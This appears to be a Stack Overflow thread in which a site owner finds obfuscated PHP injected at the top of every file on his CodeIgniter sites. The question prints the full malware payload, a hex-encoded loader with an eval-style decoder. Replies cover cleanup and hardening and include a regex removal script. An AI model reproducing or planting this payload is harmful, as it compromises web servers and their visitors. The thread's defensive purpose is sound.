# My website seems to be hacked? Obscure code on the first line of every PHP file?

Tags: php, codeigniter, virus

I have the following in the first line of every PHP file in my server:

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $hnzocslrhq = 'y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x782x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:porting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;PT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787f:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QI%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{67825-bubE{h%x5c%x7825)x5c%x78257>%x5c%x782f7&6|7**111127-K)ebf4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78c%x785c1^W%x5c%x7825c!>!%x5c%5+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!o)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%xsX%x5c%x7827u%x5c%x7825)7fmji%x57825bT-%x5c%x7825hW~%x5c%x7825pcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-11111824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]4c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x78x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5osvufs!*!+A!>!{e%x5c%x785c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%15tzw>!#]y76]277]y72]265]y39]274]6~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%xI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D63]y76]277#<%x5c%x7825t2w>#]e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<C2178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]yy]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%y35]256]y76]72]y3d]51-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x7825c%x78256<^#zsfvr#%x5c%x785cq%hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%61"])))) { $GLOBALS["%x61%156%x75%1ufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmgx5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~4") && (!isset($GLOBALS["%x61%156%x75%156%x-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x74-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x*#k#)tutjyf%x5c%x7860%x5c%x787%x7824-%x5c%x7824<%x5c%x716,47R57,27R66,#%x5c%x782fq%x5c%x7825>x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%xc%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x786*CW&)7gj6<*doj%x5c%x78257-C>^#zsfvr#%x5c%x785cq%x57878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x7doF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{*x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!5c%x7825r%x5c%x7878<~!!%x5c%c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pdC)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%Q&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%c%x7860QUUI&c_UOFHB%x5!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#5h>#]y31]278]y3e]81]K78:56985:6197g:7498}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;05c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osv%51%x29%73", NULL); }w**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]275-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:52985-t.gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#Px7825)!gj!|!*1?hmg%x5b%x5c%x7825ggg!>!#]y81]273]y76]258]y62q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepozcYufhA%x5c%x78272qj%xsutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujptpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x223}!+!<+{e%x5c%x78225w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<p25)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnb!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56fpg)%x5c%x7825%x5c%x7824-c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj76]62]y3:]84#-!OVMM*<%x22%51%x29x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QD8e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x78)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x782fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]bz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x78245c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]4ssfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-E72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)34%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!25)}.;%x5c%x7860UQPMSVDx7825)m%x5c%x7825):fmji%x5c%x7878:<##:2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7t)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sf56<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78x5c%x7825)j{hnpd!opju7824*<!%x5c%x7825kj:!>!#]y3d]51]#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%25:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%+;!>!}%x5c%x7827;!>>>!}_;gvc%x5ovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufsc%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x598]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#725)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c72]37y]672]48y]#>s%x5c%x7825<#462]47y]25%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x=]0#)2q%x5c%x7825l}Sx7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~25!**X)ufttj%x5c%x7822)gj!|!*]248]y83]256]y81]265]y72]254]y76]61]y33]68]y56%x61"]=1; function fjfgg($25:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x788%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]34]68]y33]65]y31]53]y6d]281]y43]7n){return chr(ord($n)-1);} @error_re81]273]y76]258]y6g]273]y76]271]y7d]252]y74]2c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%1412]18y]#>q%x5c%x7825<#76-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787if((function_exists("%x6f%142%x5f%163%x74%141%x72%16:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x7824%x5c%x7825)!gj}Z;h!opj%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|sqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91dovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%xx7825)Rd%x5c%x7825)Rb%x%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275d%x5c%x7825w6Z6<.4%x55c%x7825%x5c%x7824-%x5*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x7878X6<#o]o]Y%x5c%x78257;utp825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%45]43]321]464]284]364]6]234]342]58]24]31#-%udovg}{;#)tutjyf%x5c%x7860opjudx5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tw%x72%162%x61%171%x5f%155%x61%160%x28%42%x6824-tusqpt)%x5c%x7825z-#:#*%x5c%x782<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]56#<!%x5c%x7825ff2!>!bssI#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%c%x7825)!gj!<**2-4-bubE{h%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7666~6<&w6<%x5c%x787fw6z-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x78x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs25}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x55c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdob*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5mcnbs+yfeobz+sfwjidsb%x5c%x7860bj+ux5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jnpd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%xg]273]y76]271]y7d]252]y74]256#<!%%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tu8]y33]65]y31]55]y85]82]y!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-37]278]225]241]334]368]322]3]364]6]283]427]367825c*W%x5c%x7825eN+#Qi%x5y85]273]y6g]273]y76]271]y7d]252]y74]256]y39c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{5%x5c%x7827jsv%x5c%x78256<c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttff%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5w6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x78U%x5c%x7860MPT7-NBFSUT%x5c%x7860LD/(.*)/epreg_replaceglbldkfmmd'; $rpqfdfffwr = explode(chr((146-102)),'7170,52,2186,43,2050,35,6610,28,6771,36,252,54,6910,56,8215,42,1348,69,5043,55,2658,42,4577,57,4189,46,7648,21,5984,65,4459,66,498,44,1449,48,3179,53,564,40,796,32,2507,46,7731,33,1550,39,8751,43,7292,39,4525,52,10072,34,403,52,10011,61,4235,61,3892,23,1955,30,47,63,9729,26,2634,24,4382,45,9102,54,6851,59,1297,51,2607,27,2894,55,110,61,8293,65,5202,67,1887,68,5676,47,8606,22,7691,40,2411,40,8358,58,7937,60,5391,23,3005,59,6111,31,2830,64,7270,22,7906,31,6142,43,3232,64,2085,49,171,37,6989,38,4973,70,4110,59,9857,47,542,22,3915,63,3777,21,8547,32,7401,51,1810,56,5822,21,7452,65,5940,44,9191,60,5562,49,5329,62,5164,38,9251,70,4808,62,927,64,8106,51,5611,65,9156,35,858,69,1985,65,7517,23,8877,42,455,43,2949,34,3978,24,2983,22,9755,39,3434,43,2553,54,6537,29,8982,69,9973,38,1139,68,8794,42,7079,53,342,61,4296,33,4329,28,9935,38,7331,70,604,38,4169,20,671,56,1273,24,6334,41,7132,38,9794,63,5269,60,3064,38,2373,38,3835,57,2700,47,2318,30,6699,39,7027,52,3142,37,8416,43,6456,20,5098,66,4634,54,1417,32,9564,43,7600,48,3477,70,1631,27,0,47,8684,67,6638,61,6049,62,1043,31,8483,64,5414,38,4870,52,6375,40,6966,23,5452,67,7222,48,1760,50,6807,44,8459,24,4749,59,8060,46,7540,60,2229,51,8257,36,2280,38,7669,22,9607,61,2348,25,8579,27,991,52,9668,61,4357,25,4072,38,727,69,5843,32,1866,21,3671,60,6415,41,9538,26,642,29,6476,61,9434,59,9354,56,4922,51,8628,56,2134,52,8157,58,3317,57,3102,40,3547,60,6274,60,1658,55,5519,43,7764,43,7807,56,1589,42,5875,65,1713,47,9051,51,828,30,4688,61,9493,45,1074,65,7863,43,8919,63,1497,53,2802,28,2747,55,3607,64,5723,32,3374,60,208,44,306,36,6237,37,6185,52,2451,56,9904,31,1207,66,8836,41,3731,46,7997,63,5755,67,3798,37,9321,33,4002,70,6566,44,6738,33,9410,24,4427,32,3296,21'); $tsegwskutb=substr($hnzocslrhq,(33673-23567),(48-41)); if (!function_exists('kmcmhwubbu')) { function kmcmhwubbu($xsdezhfqaa, $ubtaczdqhk) { $qgqaoctdjy = NULL; for($jmqaqzyrxj=0;$jmqaqzyrxj<(sizeof($xsdezhfqaa)/2);$jmqaqzyrxj++) { $qgqaoctdjy .= substr($ubtaczdqhk, $xsdezhfqaa[($jmqaqzyrxj*2)],$xsdezhfqaa[($jmqaqzyrxj*2)+1]); } return $qgqaoctdjy; };} $vszierpgtn="\x20\57\x2a\40\x75\146\x6d\160\x6f\161\x78\165\x75\156\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\65\x36\55\x32\61\x39\51\x29\54\x20\143\x68\162\x28\50\x35\71\x35\55\x35\60\x33\51\x29\54\x20\153\x6d\143\x6d\150\x77\165\x62\142\x75\50\x24\162\x70\161\x66\144\x66\146\x66\167\x72\54\x24\150\x6e\172\x6f\143\x73\154\x72\150\x71\51\x29\51\x3b\40\x2f\52\x20\144\x7a\155\x66\154\x71\153\x6f\142\x63\40\x2a\57\x20"; $vwfvdrtloh=substr($hnzocslrhq,(47118-37005),(78-66)); $vwfvdrtloh($tsegwskutb, $vszierpgtn, NULL); $vwfvdrtloh=$vszierpgtn; $vwfvdrtloh=(391-270); $hnzocslrhq=$vwfvdrtloh-1; ?><?php
```

I hope this didn't delete any of my code because I never backed my website up (it's hosted on a webhoster Arixe)

I'e looked this up on google, and it seems like wordpress had a similar problem. Problem is, this problem is only on my website, which isn't a wordpress site. The website is built on CodeIgniter.

I just checked my other codeigniter built websites and it seems as though this code got in all of them!

Comment: Guessing your hosting account got compromised. Get your code backed next time using Git or SVN

Comment: Where do you, or how do you, change your website and test it before putting it 'live'?

Comment: @MrPablo A VCS is *not* a backup tool

Comment: @PeeHaa no, but it's a start and can provide a backup if need be. Not the best, but yea.

Comment: tbh, I just edit the files straight from the server via ftp

Comment: Then you will have copies of the files you edited on your (pc?)  from the download via ftp. If you haven't deleted then then that will still be on your pc. Check where your ftp client downloads them and they should be in that directory.

Comment: Unfortunately, Aptana Studio 3 deletes its local files upon exit :/
What exactly is this code, and what does it do? (if anyone has the time to go through this of course)

Comment: sigh - not sure what to say at this point. May i suggest that you setup something more reliable for next time? btw, you have my sympathy, a lot of us have been through this exact same issue. Is 'frustrating' but also a  (programming) 'life lesson'?

Comment: Can't I just delete that code in every file and back up, and hope that it won't happen again? (though doing so in every file will be tedious, so maybe there is a script out there that will check every file to see if that code is in there, and if so, deletes it)

Comment: Sadly, deleting the 'nasty code' will not help that much. You need to find out how it happened or, at least, upgrade the software you are using to the latest version. If you do not change anything then it **will** happen again. It wasn't  just that 'chance' that it was 'corrupted' this time. You have an 'exploitable weakness' somewhere on your website. It must be found and fixed. I went though a similar experience recently. Is 'irritating' or 'interesting' depending on your 'point of view'. Learned a lot ;-/ The 'service provider' support was very helpful in tracking the issues with me.

Comment: Does your service provider have an old backup they can restore for you?

Comment: @RyanVincent - So most likely it's a hole in my websites? Or could it be that my hosting account was compromised. Like what would be the most likely from top to bottom :/

I'm calling them now to ask

Comment: Search the internet for recent exploits for whatever software you are using. Also for the version of PHP you are using, version of CI you are using. Look at your server logs for what 'odd' queries are happening. Both before and after the dates your website got corrupted.  Talk to 'support' they may have seen other sites, as well as yours, with similar issues. . Expect to learn rather more than you want to know about 'websites and exploits'. ;-/ It  is fixable! Seriously! :-)

Comment: Make sure your host doesn't allow excessive login attempts to Unix user acccounts - I was on a host that was compromised because thousands of FTP attempts were permitted until the password was searched for. A hole in your software is more likely though - just saying that host security failures do happen.

Comment: (If your sites are on the same box, running under the same Apache user, then it is likely that once one is compromised, they all will be).

Comment: Assume that the issue is with your website rather than the 'service Provider'. They have staff checking every day for 'exploits' of their system . If your website is 'compromised' they are the 'first port of call' to fix your 'website issues'

Comment: Look in the html source of your web pages -- there might be extra meta tags -- if yes then google the content of the meta tags for help with what this could be.

Answer (score 2):

If you haven't a backup of your website you are screwed.
You should change your password and update your platform at any level (linux, php, framework and your website)

Comment: Glad I found this in my search results, I've found a horribly compromised site recently... :''(

Answer (score 2):

My problem was solved by: Changing all passwords FTP, Host,DB, Wordpress in same host.

After that follow this:

1. Create a file called `removemalware.php` at your base codeigniter folder, aside with `index.php`.

2.Put this content on.

```
$directory_iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator('c:/wamp/www/yoursitehere', RecursiveDirectoryIterator::SKIP_DOTS));

foreach($directory_iterator as $filename => $file)
{

    if ($file->getExtension() !== "php") {
        continue;
    }
    $content = file_get_contents($filename);
    $reg = '/<\?\s*php\s*if\(!isset\(\$GLOBALS\[\"\\\\x61(.*?)-1;\s*\?>/s';
    $count = 0;
    $newContent = preg_replace ($reg, '', $content, -1, $count);

    if($count === 1) {
        echo $filename." with malware...<br>";
        file_put_contents ($filename, $newContent);
        echo $filename." rewrite without malware.<br>";
    }
}
```

3. Edit your `.htaccess` to allow removemalware.php to be accessed. 
   (example: `RewriteCond $1 !^(index\.php|assets|public|thumbs|sitemap\.xml|robots\.txt|removemalware\.php))`
4. Access the file, be happy.